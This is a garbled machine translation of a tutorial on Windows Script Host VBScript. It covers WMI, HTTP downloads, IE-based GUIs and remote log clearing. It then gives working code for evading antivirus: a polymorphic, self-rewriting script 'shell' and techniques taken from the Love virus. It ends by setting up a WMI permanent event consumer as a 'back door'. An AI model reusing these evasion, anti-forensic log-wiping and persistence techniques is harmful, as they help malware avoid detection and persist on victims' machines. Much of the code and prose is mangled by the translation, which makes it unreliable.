In-depth excavation of Windows script technology
[Contents] 1. Preface 2 . The Windows script here refers to the "WSH Windows Script", not the scripts in the HTML or ASP. The former is explained by WScript or CScript, and the latter is interpreted by IE and IIS, respectively. The language described is VBScript. This article assumes that the reader has a certain foundation of Windows scripting programming. If you still don't understand this, please learn "Windows Script Technology" [1]. [Review WSH Object] Thanks to the support of COM technology, WSH can provide a more powerful function than batch processing (.bat). To put it bluntly, WSH is just calling ready-made "controls" as an object, with the object's properties and methods. Common objects include the root object of the WScriptWindows script host object model, you should use WSH Naturally. It provides multiple sub-objects such as WScript.Arguments and WScript.Shell. The former provides access to the entire command line parameter set, the latter can run the program, manipulate the registry content, create shortcuts or access the system folder. Scripting.FileSystemObject is mainly an object of IIS design, accessing the file system. This is probably everyone encountered the most object, because almost all Windows script viruses must copy themselves infected with others. ADODB.STREAMACTIVEX DATA Objects database sub-objects, providing a function of accessing files. This is part of a database, but thanks to Microsoft, ADO is self-contained. Microsoft.xmlhttp is an object designed to support XML and access the network via HTTP protocol. Often used for cross-station scripts to perform vulnerabilities and SQL INJECTION. There are also many uncommon: Active Directory Service Interface (ADSI) related objects - feature is widely used, mainly for Windows domain management. InternetExplorer Object - Doing various things that IE can do. Word, Excel, Outlook object - to process Word documents, Excel forms, and messages. WBEM object - WBEM is web-based Enterprise Management. It provides powerful functional support for managing Windows. The WMI service mentioned in the next section provides the interface of the object. Obviously, WSH can be utilized far more than this. This article hangs a leaks, talk about some more practical objects and their usage. First look at an example of supporting breakpoints to download web resources, it uses four common objects mentioned above.
IF (LCase (WScript.Fullname, 11)) = "wscript.exe") Then 'judgment the name of the script host' Die ("Script host must be cscript.exe.") 'script host is not CScript, so Die The 'end ifif wscript.arguments.count <1 Then' must have a parameter 'Die ("USAGE: CScript webdl.vbs url [filename]")' Sparrow although the sparrow is small, usage can't forget 'end iFurl = WScript. Arguments (0) 'parameter array subscript starts' IF URL = "" "" Dare ("URL CAN't Be Null.") 'Dare ("URL CAN't Be Null.")' I'm giving me. 'First judgment whether the number of parameters is greater than 1' filename = wscript.Arguments (1) 'Re-access the second parameter' else 'If no file name is given, you get' T = Instrrev (URL, "/" ) 'Get the last "/" position' IF T = 0 or T = LEN (URL) THEN DIE ("Can not get filename to save.") 'No "/" or "/" end' filename = Right (URL, LEN (URL) -t) 'Gets the file name to be saved' end ifif not left (URL, 7) = "http: //"
THEN URL = "
http: // "& url '
If you carefully put "http://", add 'set fso = wscript.createObject ("scripting.filesystemObject")' fso, ASO, HTTP three objects can't 'set aso = wscript.createObject (" Adodb.stream ") set http = wscript.createObject (" Microsoft.xmlhttp ") if fso.fileexists (filename) Then 'determines if the file to be downloaded does already exist' start = fso.getfile (filename) .size 'exists, The current file size is started with 'else start = 0' does not exist, everything starts from zero 'fso.createtextfile (filename) .close' New file 'endwwwscript.stdout.write "connection ..." "Good play" Current = start 'The current location is starting location' do http.open "get", URL, TRUE 'here call http' http.setrEquestHeader "Range", "Bytes =" & Start & "-" & CSTR (Start 20480) The mystery of the breakpoint is here 'http.seuestheader "Content-Type:", "Application / OcT-stream" http.send' constructs the packet to send 'for i = 1 to 120 'Cycle Waiting for' if http.readyState = 3 THOWPLAN () "State 3 Indicates that the data is started, the display progress' if http.readyState = 4 THEN EXIT for 'Status 4 indicates that the data accepts the complete' WScript.sleep 500 'Waiting 500ms' Next if not http.readystate = 4 Then Die ("timeout.") '1 minute has not finished 20K? time out! 'IF http.status> 299 Then Die ("Error:" & Http.status &
"& http.statustext" is not, and wrong? 'If not http.status = 206 The Die ("Server NOT Support Partial Content.")' Server does not support breakpoints' ASO.TYPE = 1 'data stream type Set to byte' aso.open aso.lyfromfile filename 'Open file' aso.position = start 'Settings file pointer initial position' aso.write http.responsebody 'Write Data' ASO.SAVETOFILE FileName, 2 'Overwrite Save' aso.close Range = http.getresponseheader ("Content-Range ") 'Get the" Content-Range "' if Range =" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "-") 1) 'Content-Range is similar to 123-456 / 789' current = clng (Left (Temp, INSTR (TEMP, "/") - 1) '123 is the start position, 456 is end Location 'Total = CLNG (MID (Temp, INSTR (Temp, "/") 1))' 789 is the number of files total bytes 'if Total-current = 1 THEN EXIT DO' End position is more than the total size 1 Transmission completed 'Start = Start 20480 'Otherwise download 20K'Loop While Truewscript.echo Chr (13) & "DOWNLOAD (" & Total & ") DONE."' Download, display the total byte number 'function Die (msg)' function name from Perl built-in function DIE ' Wscript.echo msg 'Connect the words ^ _ ^' wscript.quit 'to see Marx'
End functionFunction showplan () display download progress' if i mod 3 = 0 THEN C = "/" 'Simple dynamic effect' if i mod 3 = 1 THEN C = "-" if i mod 3 = 2 THEN C = " / "wscript.stdout.write chr (13) &" Download ("& Current &") "& CHR (8) '13 ASCII code is back to the list, No. 8 is the back Function can be seen, HTTP control Function is very powerful. By operation of the HTTP header, it is easy to achieve breakpoints. In the example, it is just a single thread, in fact, because the HTTP control supports asynchronous calls and events, you can also implement multi-threaded downloads. There is a detailed usage in MSDN. As for the details of the breakpoint, please see RFC2616. FSO and ASO can access files, what is the difference? In fact, ASO does not except for access to byte (non-text) data, there is no need to exist. If you want to implement the ASO in the example with FSO, it will be wrong when you write http.responsebody. Violation, ASO cannot determine if the file is present. If the file does not exist, LoadFromFile is a chance to correct and do not correct. Of course, you can use the ON Error Resume next statement to let the script host ignore non-fatal errors, capture and process themselves. But there are ready-made fileexists () why not? In addition, since FSO is often used by script viruses and ASP Trojans, the administrator may modify the information of the control in the registry to make the script unable to create FSO. In fact, an order regr32 / s scrrun.dll is restored. Even if Scrrun.dll is deleted, you will copy it in the past. After the warming up, let's take a powerful object - WBEM (provided by WMI). [WMI Service] First look at how the MSDN describes WMI -Windows Management Specification (WMI) is a scalable system management structure, which uses a unified, standard, scalable object-oriented interface. When I was just understanding WMI, I always thought that WMI is "Windows Management Interface" (Interface), huh, huh. Look at what WMI service - provides a common interface and object model to access management information about operating systems, devices, applications, and services. If this service is terminated, most Windows-based software will not function properly. If this service is disabled, any service that relies on its service will not be able to start. It seems to be a very important service. However, by default, there is no service to rely on it, but it is to rely on RPC and EventLog services. But it is often used. I set the WMI service to start and stop, using the computer for a while, I found that the WMI service was started again. It is necessary to start, which is the characteristic of the service set to "manual". When I know how much the management information provided by WMI is, I don't feel strange to the Self-starting of WMI services. I want to understand the complexity of WMI, you can use Wmitows.exe [2]. This is a tool set. Use WMI Object Browser to see many WMI-provided objects, which are not complex. More importantly, WMI also provides dynamic information, such as current processes, services, users, etc.
The logical structure of WMI is this: first is WMI user, such as script (exactly script host) and other applications that use the WMI interface. The WMI user accesses the CIM object manager Winmgmt (ie WMI service), the latter re-accesses the CIM (Public Information Model CommON Information Model) Repository. Static or dynamic information (objects of the object) is saved in the CIM library while still having an object. Some operations, such as starting a service, implementing the object. This is actually called various DLLs through COM technology. Finally, the request is completed by the API packaged in the DLL. WMI is an event-driven, operating system, service, application, device driver, etc. can be used as an event source, and event notifications are generated via COM interface. Winmgmt captures events and then refreshes dynamic information in the CIM library. This is why WMI services rely on EventLog. After the concept, let's take a look at how to operate the WMI interface. The code below is from the script RTCs I write. It is a script that remotely configures Telnet service. Here, only the key parts: The first is to create an object and connect to the server: set objlocator = createobject ( "wbemscripting.swbemlocator") set objswbemservices = objlocator.connectserver (ipaddress, "root / default", username, password) created the first sentence A service positioning object, then the second sentence connects the server with the ConnectServer method of the object. In addition to the IP address, user name, password, there is also a namespace parameter root / default. Just like the registry has a root key, the CIM library is also classified. Use the object-oriented term to be described as "name space" (Name Space). Since RTCs should process NTLM authentication methods and Telnet service ports, they need to access the registry. Operating the object of the registry in root / default.
set objinstance = objswbemservices.get ( "stdregprov") 'StdRegProv instantiated objects' set objmethod = objinstance.methods _ ( "SetDWORDvalue")' SetDWORDvalue method also an object itself 'set objinparam = objmethod.inparameters.spawninstance_ ()' Examples of input parameters Object 'objinparam.hdefkey = & h80000002' root directory is HKLM, code 80000002 (16) 'objinparam.ssubkeyName = "Software / Microsoft / Telnet Server / 1.0" Set Sub button' objinparam.svaluename = "ntlm" set key value NTLM 'Set key value content, NTLM is variable, determined by the user input parameters' set objoutparam = objinstance.execmethod _ ("setdwordValue", then set the port Objinparam.svalueename = "telnetport" Objinparam.uValue = port 'port is also the parameters entered by the user' set objoutparam = objinstance.execmethod _ ("setdwordValue", objinaM) See here? It is also a name space and is an instantiation of the class. I feel very uncomfortable when I just started learning WMI. I remember that my junior high school teacher said, reading must first read the book, and then read the book. It is because of the joining his own ideas, reading is because it is to grasp it. Let's read books now. The above code can be changed to: set oreg = creteObject ("wbemscripting.swbemlocator") SET OREG = Olct.connectServer (IP, "Root / Default", User, Pass) .get ("stdregProv") hklm = & h80000002out = Oreg. SetdwordValue (HKLM, "Software / Microsoft / Telnet Server / 1.0", "NTLM", NTLM) OUT = Oreg.SetdWordValue (HKLM, "Software / Microsoft / Telnet Server / 1.0", "TelnetPort", PORT) is now simple now. ? Next, it is control over the Telnet service state. set objswbemservices = objlocator.connectserver (ipaddress, "root / cimv2", username, password) set colinstances = objswbemservices.execquery ( "select * from win32_service where name = 'tlntsvr'") for this connection is root / cimv2 namespace.
Then use WQL (SQL for WMI) to search for TLNTSVR services. I know what I am doing when I am familiar with SQL syntax. This is a set of Win32_service instances, although the WHERE statement determines that the group always has only one member. For simplicity, suppose as long as the service status is switched. for each objinstance in colinstances if objinstance.started = true then 'depending on whether the service has been launched to determine the properties started' intstatus = objinstance.stopservice () 'is to call stopservice stop service' else intstatus = objinstance.startservice () 'No, call startservice Starting the service 'end ifnext key code is these, the rest is the process of processing the input and output and fault tolerance. Summarize the process: 1. Connect the server and the appropriate namespace. 2. A or a set of instances of the required object with the GET or EXECQUERY method. 3, read and write the properties of the object, call the method of the object. So, how do you know which name space to connect, what objects get? The Classification of the WMI Technical Guide [3] lists a large number of commonly used objects. Unfortunately, it has no corresponding e-book, you only go to the bookstore to find it. You can also use the WMITools for the WMI CIM Studio search function, it is easy to find the desired object. After finding an object, WMI CIM Studio lists its properties and methods, then find specific help in MSDN. Application examples, in addition to the 7 RS series scripts I wrote, there are also reference materials [4]. It is necessary to specifically explain that in response [4], the connection server and the name space are similar to the following syntax: set objwmiservice = getObject ("WinMgmts: {ImpersonationLevel = Impersonate}! //" & strComputer & "/ root / Cimv2 : Win32_process ") Detailed syntax is introduced in the" WMI Technical Guide "and MSDN, but we don't care about it, because this method does not have username and password parameters. Therefore, only if the current user can be used in the target system (including local). If ConnectServer is used locally, the first parameter can be 127.0.0.1 or a point ".", The 3rd, 4 parameters are empty strings "" ". Finally, there is still a "privilege" issue for WMI. If you have seen the ROTS code, you will find two "strange" statements: objswbemservices.security_.privileges.add 23, trueobjswbemservices.security_.privileges.add 18, True This is to apply to WMI service. 18 and 23 are all authority code. Some important codes are listed below: 5 Creating an account in the domain 7 Managing audits and views, saves and cleaning security logs 9 loading and unloading device driver 10 Recording system time 11 Change system time 18 Local shutdown 22 Winding past passing 23 Allow remote shutdown details, please also look at the "WMI Technical Guide" or MSDN. All privileges are not available. When I wrote RCAS, because I forgot to apply for privileges 11, the result has been tested failure, and I only found the reason for a long time. As long as there is permission to connect to the WMI service, you can always apply for privileges. This privilege mechanism is just to constrain the behavior of the application, and the system stability is enhanced.
It is a bit strange that accessing the registry does not have to apply for any privilege. I really don't know what Microsoft's developers think it may be that the access registration is too common. [Script also has GUI] Although the system provides WScript and CScript two scripts, the script is responsible for the window environment and the script in the command line environment, but in fact, the user and script interaction in the window environment are not very convenient: parameter input can only establish fast The InputBox dialog box will pop up the InputBox dialog, and only after the user is "determined" after the user is "OK". There is no intuitive and fast advantage in the window environment. Fortunately, there is an InternetExplorer object, the script can provide a Web style GUI. Or come to see an example, a script for clearing the system log, review WMI: SET IE = WScript.createObject ("InternetExplorer.Application", "Event_") 'Create IE object' ie.menubar = 0 'Cancel menu bar' IE.Addressbar = 0 'Cancel address bar' IE.Toolbar = 0 'Cancel toolbar' IE.statusbar = 0 'Cancel status bar' IE.Width = 400 'width 400'ie.height = 400' high 400'IE. Resizable = 0 'does not allow the user to change the window size' IE.NAVIGATE "About: blank" 'Open Blank Page' IE.LEFT = FIX (IE.Document.ParentWindow.Screen.availwidth-IE.Width / 2) 'level中 中 i.top = FIX (ie.document.parentwindow.screen.availheight-ie.height) / 2) 'vertical home' ie.visible = 1 'window visible' with IE.Document 'The following call document.write method,'. Write "
" 'ie to write a html window.'.write "
Target IP: " can also use Navigate Open a '.write "
Username: "' an HTML file, the effect is the same. '.write "
Password: ". Write "
Type:"' Not only INPUT object, all DHTML support '.write " Applications' objects and their properties, the method can be used. '.write " < BR> "'The object within the frame is similar. '.write "" .write "". Write " " endhdim wmi) Define a global variable 'set wnd = ie.document.parentWindow' Settings WND for window object 'set id = IE.Document.all' Sets the collection of all objects in Document 'id.confirm.οclick = GetRef ("confirm ") 'Set the handler when you click the" OK "button' id.cancel.οnclick = getRef (" CANCEL ") Set the handler" Cancel "button to the" Cancel "button 'Do While True' Since the IE object supports events, The 'WScript.sleep 200' script waits for a variety of events in an infinite loop. 'loopsub Event_ONQUIT' IE Exit Event Process' WScript.quit 'When Ie exits, the script also exits' End Subsub Cancel' "Cancel" Event Process' IE.quit 'Call IE Quit Method, Turn off IE Window' End Sub 'Then triggered Event_onquit, so the script also exited the' Sub Confirm '"OK" event process, which is the key' with idif.id.value = "" "" "" "" "" "ip value default It is the local operation 'if not (.app.checked or.ches.checked or. Sec.checked "app, etc. is Checkbox, by detecting its check' wnd.alert (" At least one log ") 'attribute To determine whether it is selected. 'Exit subnd iFset LCT = CREATEOBJECT ("Wbemscripting.swbemlocator")' Creating Server Location Object 'on Error ResMe next' makes script host 忽 非 非 非 = Lct.connectServer (.ip.value, "root / cimv2" , .user.value, .pass.value) 'Connect to root / cimv2 name space' if err.Number dam capture error and handle 'Wnd.alert ("Connect WMI Server Failure")' This is just a simple display " Failure "'Err.clear On Error Goto 0' still processes all script hosts full error 'exit suend ifif .app.checked the Clearlog" Application "' Clears each selected log 'if.s.ches.checked dam" system "if . Sec.checked Ten Clearlog "Security" 'Note, there is a restriction under XP, you can't clear the security log' Wnd.alert ("Log Cleared" endhend subs coplelog (name) WQL = "SELECT * from Win32_nteventlogfile where logfilename = '"& name &" "set logs = wmi.execquery (wql)' Note that members of logs are not every log, 'For Each L in logs 'But specify the file object of the log. 'If l.cleareventlog () THEN WND.Alert ("Clear Log" & Name & "Error!") IE.quit WScript.quit End ifnextend Sub summed up the entire process. The first is to create an InternetExplorer.Application object. Its direct effect is to start an Iexplorer process, but the window is invisible until IE.visible = 1 is set. The HTML statement is then written to the IE window with the Document.Write method. For complex interfaces, the HTML code can be saved as an HTML file, open with IE.NAVIGATE (FileName). Finally, it is the input in the response window. This is basically a scope of knowledge of DHTML. The most different from the general script programming is that IE is an event-driven. What you have to do is setting the corresponding event handler / process. In this example, the script only cares about 3 events: IE exits, "OK" button is clicked, "Cancel" button is clicked. Note that there is only two statements that set the event handling process in the example, and no IE exit event is associated with the Event_ONQUIT process. This is because here uses a feature - the second parameter "event_" when creating an IE object is a prefix, and the Event Process of the IE object is the prefixed event name. So the process of the ONQUIT event is due to Event_ONQUIT. When the "OK" button is clicked, the confirm process is called. The example demonstrates how to access objects in IE, such as IE.Document.all.ip.Value is the input in the Target IP text box. If "Application" this checkbox, IE.Document.all.App.checked is true, otherwise false. To call the Alert method, use IE.Document.parentWindow.alert. The access methods of other IE objects are totally similar. Specifically, you can see DHTML related information. With the web interface, interaction becomes rich and colorful. Everyone can give full play to creativity. For example, many GUI tools (such as streaming) are started, there is a logo page, display copyright information. We can simulate one out: set IE = wscript.createObject ("InternetExplorer.Application") ie.fullscreen = 1ie.width = 300ie.Height = 150ie.navigate "About: blank" IE.LEFT = FIX ((( IE.Document.parentwindow.screen.availwidth-IE.Width/2) IE.top = FIX ((IE.Document.parentwindow.screen.availheight-ie.height) / 2) ie.document.write "
"& _" this is a Logo "ie.visible = 1wscript.sleep 5000ie.quit performed after the above code It will display an IE window in the center of the screen and the two-frame and the border, lasting for 5 seconds. The window is a black word of the blue bottom. This is a logo. After the script GUI, the interaction with the user is more intuitive. Tools with many parameters like NMAP, when used locally, "Interface" that writes a graphical interface is eternal. The result of the output can also be processed with script to display, which is displayed in a way that can generate an HTML scan report like a tool such as stream light. [Inspected killing] must first explain that I have not tried to challenge the anti-virus software anti-virus capabilities. The Windows script is an explanatory language, a clear text saves code. Since there is no compilation process, the complexity of the code is far less than the executable program (EXE). Don't do anything else, there is no reason to count on the script. However, it is because the inspection of the script is very poor, so that the killing method used by anti-virus software is not advanced. So we organically multiply. Let's take a look at the common anti-check method: 1, split / reorganization of strings or statements.
The most typical example is to turn FSO = CreateObject ("scripting.filesystemObject") to fso = createObject ("script" "ING.FILESYSTE" "MOBJECT") Extension Extension is to use Execute statement: Execute ("FSO = CREA " " teobject ("" SCR " " ipting.filesy " " STEMOBJECT "" ") 2, the variable name is automatically changed. Randomizset of = createObject ("scripting.filesystemObject") VC = Of.OpenTextFile (wscript.scriptfullname, 1) .readAllfs = array ("of", "vc", "fs", "fsc") for fsc = 0 to 3VC = Replace (VC, FS (FSC), CHR (INT * 22) 65) & chr ((int (RND * 22) 65) & chr ((int (RND * 22) 65) ) & Chr ((IND * 22) 65))) NextOf.OpenTextFile (WScript.Scriptfullname, 2, 1). The code above this code is taken from the love virus. If you run, you will know how to return. Things. 3, use the official tool - script encoder Screnc.exe [5] encrypted script. The encrypted script can be directly explained by the script host. This is the best solution, but "guns and birds", because encryption is reversible, all anti-virus software has decoding function. Therefore, the effect of this approach is basically zero. The first method is effectively telling us that this fact: the killing of the script virus is basically static. Moreover, I found that even if it is only changed, it can also play an anti-check (only a anti-virus software). The key to the reverse investigation is to reduce the signature. For the anti-check killing of EXE, it is easier to think about "housing". This approach can also be applied on the script. For example: str = "cswpire.tohco" "" "" "" "for i = 1 to Len (str) Step 3REV = Rev Strreverse (MID (STR, I, 3)) NEXTEXECUTE REV A simplest" shell ". The algorithm of "shell" is the order of reverse per n character. n is the "seed" of the algorithm. In this example it is equal to 3. This "shell" is dead and does not reducing the effect of the signature. Instead, the signature is added, such as "CSWPire".
Look at a complex example: str = "wscript.echo" "ok!" ": RDomize: key = int (RND * 8 2): str = Re: str = Replace (STR, CHR (34), CHR (34) CHR (34)): SET ASO = CREATEOBJECT ("AdoDb.Stream"): with aso: .Open: .writetext "Str =" CHR (34) STR CHR (34) "": key = "" cstr (key) "": str = rev: Execute str: function rev (): for i = 1 to len (str) Step key: Rev = Rev Strreverse (MID (STR , i, key): next: end function "":. Savetofile wscript.scriptfullname, 2: end with ": key = 1: str = Rev: Execute str: function rev (): for i = 1 to Len (STR ) Step key: rev = Rev Strreverse (MID (STR, I, Key): Next: End Function (Note that this code is only one line, no carriage return) is saved as a VBS file, double-click execution, effect or the previous code Like, pop up a dialog box displays "OK!". However, after the execution will look at the code, it may become like this: str = "tpircsw" "ohce.ar:"" !koezimodnni=yek:8*dnr (TRTS: 2 ts :ver=alper=R ,rts (EC) 43 (RHC43 (RHC, 3 (RHC ) TES :)) 4RC = OSA JBOETAEDA "" "(Tcerts.bdow :)" "Maeosa HTI: nepo.: tetirw.ts" "TXERHC " = RTS ) 43 ( 3 (RHC Rek: " ) 4TSC " = Y ) Yek (rr = rts: "" CEXE: VERTS ETUITCNUF: (Ver Noi ROF:) L OT 1 =) RTS (nek pets = Ver: Yerts VERESVERTS (DIM (Yek, I, RTXEN :)) UF DNE: "NOITCNTEVAS.:W Elifo.tpircsftPircSemanllu DNE: 2, HTIW": key = 7: str = Rev: Execute str: function rev (): for i = 1 To Len (STR) Step Key: Rev = Rev Strreverse (MID (STR, I, Key): Next: End function is executed again. This script is self-deformed. If you look at the code carefully It will be found that the algorithm of "shell" is still, and "seed" is randomly changed. However, each of the shells is different, "shell" itself still has no change. Many EXE shells, shells, it is itself As a malicious code to extract the signature. For a better anti-check, the "shell" of the script also needs to be dynamically changed.
This is to use so-called polymorphism. However, EXE's polymorphism is used to counter-motion, and the "polymorphism" of the script is only payable, and the two are very different. For EXE, the real polymorphism has not yet been heard. How much is the script that can only do. Do not affect the modification of the function, in addition to the three mentioned above,: 3, " " and "&" randomly interchanged; 4, () - * / &, and other characters to add spaces or renewal (_) and the combination of Enter; 5, replace the built-in function with custom functions; even if the custom function is just a simple package built-in function, at least the keyword is changed. .......... There are other "polymorphism" algorithms to be studied. The application of these algorithms is premised on a large increase in code length. If you want to write a relatively perfect "shell", I believe that I will involve the knowledge of "Grammar Analysis", because the script should "read" itself, thus achieving the effect similar to the Java obfuscator, this is very complicated, there is a chance to be again Everyone discussed.
Below we use "statement segmentation", "variable name automatic change", "random case", " and & interchange", look at the effect: A001 = "wscript.echo" "OK!": A004 = CHR (34): Randomize: A005 = INT (RND * 24000 40960): A001 = A006 (A001): A000 = A005 MOD 10 2: A001 = Replace (A002, A004, A004 & A004): SET A007 = CreateObject ("AdoDb.Stream"): A007.Open: A007.Writetext HEX (A005 1) & "=" "& A004 & A001 & A004 & A008 (":: ":" A000 = "& A000 &": A001 = A002: Execute A001: Function A002 (): for A003 = 1 To Len (A001) Step A000: A002 = A002 STRREVERSE (MID (A001, A003, A000)): Next: End function "") & A004: A007 . Savetofile WScript.scriptfullname, 2: Function A006 (A009): For A00A = 0 to 12: A009 = Replace (A009, HEX (& HA000 A00A), HEX (A005 A00A)): Next: A006 = A009: End Function : Function A008 (A009): For A00A = 1 to Len (A009): A00B = MID (A009, A00A, 1): IF INT (RND * 2-1) THEN A00B = UCase (A00B): End if: IF A00A > 11 and INT (RND * 5) = 0 THEN A008 = A008 & A004 & CHR (38 INT * 2) * 5) & A004: END IF: A008 = A008 & A00B: NEXT: END FUNCTION: A000 = 1: A001 = A002: Execute A001: Function A002 (): for A003 = 1 To Len (A001) Step A000: A002 = A002 STRREVERSE (MID (A001, A003, A000): Next: End Fun CTION (Note, where there is no carriage return) is "original", saved as a VBS file, double-click, or the pop-up dialog box displays "OK!".
I will see what is similar to the code (the effect is random): b906 = "tpircsw" "OHCE.9B:" "! KO (RHC = 90nar:) 43: EzimodNi = A09b2 * DNR (T04 00049B:) 069B09B = 60: 609B (9B = 509B DOM A09B: 2 01Lper = 6009B (ECA, 909B, 79B & 909Btes:) 90c = c09b Boetaera "" (Tcejts.bdod :) "" MaerPo.c09bc09b: NetTirw.xeh TXE1 A09B (B & "=" "&) 09B & 909 & 909B & 6:" "(D09BETUCEXE909B &" "" "(B09B &&" = 509b: "" & 509b9b = 609bcexe: 709b etcnuf: 609b NOITOF:) (70 = 809B REL OT 1) 609B (NB PETS 09B : 509 709B = 7everrtsdim (ESRB, 609B (09B :)) 5F DNE: TNOITCNU909B &) "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" E09B (EBH & (XEH09B 509 (XEH,) F9B A09BEN :)) F0B09B: TXE: E09B = CNUF DNUF: NOIT NOITCN9B (D09Brof:) E01 = F09B Nel OT:) E09B (IM = 019b, E09B (D) 1, F09BTNI FI: -2 * DNR (NEHT) 1U = 019b 9b (esACDNE:) 01 FI: FI 11> F09BNI DNA 5 * DNR (TEHT 0 =) = D09B N9B & D09B (RHC & 90 (TNI 83 *) 2 * DNR909B & 5FI DNE: B = D09B: 19B & D09: TXEN: 0NUF DNENOITC ": EXECUTE" B9 "&" 05 = 7 "&": b906 "&" = b907: e " " xec " " ute b906 " ": Fun "&" CTION B9 "&" 07 (): for " " B9 " " 08 = 1 to L "&" EN (b906) " " Step B905: B907 "&" = B907 "&" Strreverse MID ("&" B9 "& "0" & "6, b908, b905" & ")" "): n" "EX" "T" ": End Fun" & "CTION" is not? Cooking again: f0cb = "rcsw.tpiohceko" "f:" "! =
EC0 (RHC:) 43DNARZIMO0F: EI = FCR (TN2 * DN0004904 :) 06bc0fd0f = 0f (0:) BCAC0FC0F = om F01 DF: 2 = Bc0Lper (ECACC0FC0F, 0F, EF & EC) EC0tes: D0F RC = 1Taeejbo "(Tcdodats" .Bmaerf :) "" "1D0NEPOD0F: RW.1TTI TXE (XEHFC0F &) 1 &" = "" EC0FC0F & 0F & BF & EC (2D0XE: "" Tuce & "" EEC0FD0F & F "" (0 = AC00F & "" "& AcC0f: 0f = be: CCUCEX ETBC0FNUF: OITC0F N) (Ccrof: C0F 1 = DL OTF (NE) BC0ETS 0F PF: AC = CC0CC0FRTS EVER (ESR (DIMBC0FC0F, 0F, D)) ACXEN: NE: TUF DITCN "" NOC0F & f:) e. 1D0evasifotw elircss.tppircluftmanl: 2, ecnufnoitD0F 0F (0:) 3D rof4D0Ft 0 = 21 oD0F: er = 3calp0F (eh, 3D & (xeC0FH0F A,) 4D (xehFC0FD0F :)) 4txenD0F: 0F = 0e: 3Df dntcnu: noicnufnoitD0F 0F (2:) 3D ROF4D0FT 1 = EL O0F (N:) 3D5D0FDIM = D0F (0F, 31, 4DFI:) TNI DNR (1-2 * HT) F NE = 5d0SAcu0f (E:) 5D DNEI: FI0F F1> 4DNA 1Ni DNR (T) 5 * DT 0 = neH2D0FD0F = 0F & 2C & EC3 (RHNI 8nR (T) 2 * D &) 5 * Ec0fdne :: Fi 2D0FD0F = 0f & 2N: 5D: TXE DNECNUFNOIT ": Execute" f " " 0CA "&" = = 4: F0CB " " = " " F0CC: EX " " E " " CUTE F0CB "&": F " " UNC " " Tion F0cc (): f " " OR " " F0 "& "CD = 1 to LEN (F0CB) Step F0CA: F0CC = F0CC STRR" "Ever" "SE" & "(MID (" "F0CB," "F0CD, F0CA)): Next: End fu & "nctio" & "n" is enough? --do not know. Perhaps the anti-virus engine is ignored by ignoring, and it can be automatically connected to the string. It can be "textual analysis" ... Is this "shell" practical? --No. Because the algorithm of "shell" is too simple. "Seed" A000 = A005 MOD 10 2, so if the automatic change variable name is not considered, only 10 of the shells have only 10 kinds of code. How to improve this "shell"? - Of course, more complex algorithms, more "polymorphism".
If you are interested, you can look at the "original" script code (replace the colon as a carriage return, readability is better), then strengthen it. Of course, you can also stove, free to show your creativity. [To do a back door] In front of the script, you need to introduce a very useful WMI object. In fact, this is the key to this section. The script back door is just an application. As mentioned earlier, WMI is an event-driven. The entire event handling mechanism is divided into four parts: 1. Event producers: Responsible for events. WMI contains a lot of event producers. Specific event producers in performance counters, also have universal event producers such as category, creating, modification, deletion, and other universal events. 2, Event Filter: The system generates a large number of events all times, and scripts can capture the events of interest by custom filters. 3. Event Consumers: Responsible for handling events. It can be an executable program, a dynamic link library (DLL, loaded by WMI) or script. 4, Event Binding: By binding the filter and consumer, clear what consumers are responsible for processing. Event consumers can be divided into temporary and permanent. Temporary event consumers only care about specific events during their operations. Permanent consumers as an instance of the class registration in the WMI name space, which has always been valid until it is canceled. Obviously, permanent event consumers are more practical.
Or come to see an example: nslink = "Winmgmts: //./root/cimv2:" 'only needs local connection, so use this syntax, no Swbemlocator object' set asec = getObject (NSLink & "ActivescripTeventConSumer). SpawnInstance_ 'creation "active scripting event consumer" 'asec.name = "stopped_spooler_restart_consumer"' definition of the consumer's name 'asec.scriptingengine = "vbscript"' defined scripting language (only vbscript) 'asec.scripttext = "getobject (" "winmgmts :. win32_service = 'spooler' "".) startservice " 'script code' set asecpath = asec.put_ 'registered consumers to return their links' set evtflt = getobject (nslink &" __ EventFilter ") spawninstance_ 'Creating an event filter' evtflt .name = "stopped_spooler_filter" 'define the filter name' qstr = "select * from __instancemodificationevent within 5" 'query every 5 seconds "example Change event"' qstr = qstr & "where targetinstance isa" "win32_service" "and" ' The class of the target instance is Win32_service'QSTR = QStr & "TargetInstance.name =" "" "" "" instance name is spooler'qstr = qstr & "and targetinstance.state =" "" "" "" "" "" "" "" "" "" Stopped " Evtflt.Query = qstr 'Defined query' evtflt.querylanguage = "wql" 'definition of query language (only wql)' set fltpath = evtflt.put_ 'registered filters, return to their links' set fcbnd = getobject (nslink & "__ FilterToConsumerBinding"). Spawninstance_ 'Creating a filter and consumer's bind' fcbnd.consumer =
Asecpath.path 'Specifies consumers' fcbnd.filter = fltpath.path 'Specify filter' fcbnd.put_ 'Performing Bind' WScript.echo "Installation" This script is: When "Spooler) When the state changes to stop, the consumer will process - restart the spooler. First Net Start Spooler, then Net Stop Spooler. For up to 5 seconds, Spooler will start again. The script directly running will be wrong because "ActivescriptEventConSumer Asec) is not installed to the root / cimv2 name space by default. Use Notepad to open% Windir% / System32 / WBEM / SCRCONS.MOF to delete the first line "#pragma namespace (" .//root//-DEFAULT ")" delete, or modified to "#pragma namespace.". Root // CIMv2 ")". XP / 2003 does not have this line without modification. Then do this: C: / Winnt / System32 / WBEM> Mofcomp.exe -n: root / cimv2 scrcons.mofmicrosoft (r) 32-bit MOF assembler version 1.50.1085.0007 Copyright (C) Microsoft Corp. 1997- 1999. all rights reserved. Analysis MOF file: Scrcons.Mofmof file analysis successfully stored data into the reserve library ... Completed! This is installed to root / cimv2. Mofcomp.exe and Scrcons.mof are all self-contained. 2000 The default is installed to the root / default name space, while XP / 2003 has been installed to the root / subscription name space, but due to the event filter, the event filter cannot be captured (XP / 2003 can be), the event binding cannot be across Namespace, and most events are generated in root / CIMv2, so you need to reinstall the namespaces where the ASEC to the event source is. Below this script automatically completes ASEC to re-install tasks.
